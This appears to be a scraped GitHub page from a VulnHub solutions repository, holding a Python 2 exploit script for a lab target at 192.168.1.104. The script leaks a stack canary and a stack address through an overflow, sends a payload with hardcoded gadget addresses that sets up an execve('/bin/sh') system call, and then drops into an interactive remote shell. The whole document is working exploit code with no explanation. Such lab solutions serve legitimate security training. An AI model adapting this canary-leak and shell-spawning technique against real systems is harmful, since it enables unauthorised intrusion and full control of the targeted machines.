/vulnhub-solutions

Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
Raw Blame History
67 lines (48 sloc) 1.3 KB
import socket
import struct
IP="192.168.1.104"
PORT=44101
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
def run(data, result=None):
if data:
s.send(data+"\n")
while result and not result in s.recv(1024):
pass
print("[*] Init")
run(None, "guess: ")
print("[*] Leak stack canary")
s.send("A"*(511 + 1)+"\x03")
r = s.recv(1024)
canary = "\x00"+r[524:527]
print("[*] Found canary: %s" % hex(struct.unpack("I", canary)[0]))
run(None, "guess: ")
print("[*] Leak stack position")
s.send("A"*(511 + 12)+"\x03")
r = s.recv(1024)
stack = r[535:539]
stack = struct.unpack("I", r[535:539])[0] - 588
print("[*] Stack: %s" % hex(stack))
run(None, "guess: ")
print("[*] Write shellcode")
payload = "exit\x00/bin/sh\x00"
payload += "A"*(512 - len(payload))
payload += canary
payload += "B"*8
payload += struct.pack("<I", stack + 588)
payload += struct.pack("<I", 0x080540cd)
payload += "\x00"*4
payload += struct.pack("<I", stack + 5)
payload += struct.pack("<I", 0x080540a6)
payload += "\x00"*4
payload += struct.pack("<I", 0x080a87d6)
payload += "\x0b\x00\x00\x00"
payload += struct.pack("<I", 0x08053ED2)
payload += "\x03"
print("[*] Drop the bomb")
s.send(payload)
s.send("echo 0wn3d\n")
while True:
print(s.recv(2048))
d = raw_input("$ ")
s.send(d+"\n")